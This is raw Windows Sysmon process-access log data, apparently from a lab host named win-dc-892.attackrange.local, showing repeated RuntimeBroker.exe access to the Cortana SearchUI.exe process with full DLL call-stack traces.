12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49242684C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007206Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007205Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246000C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007204Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246000C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007203Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007202Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007201Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007200Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245960C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007199Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49244456C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007198Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007197Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245960C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007196Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49244456C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007195Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49244504C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007194Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245796C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007193Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245796C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007192Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49244504C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007191Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007190Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007189Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245376C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007188Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245480C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C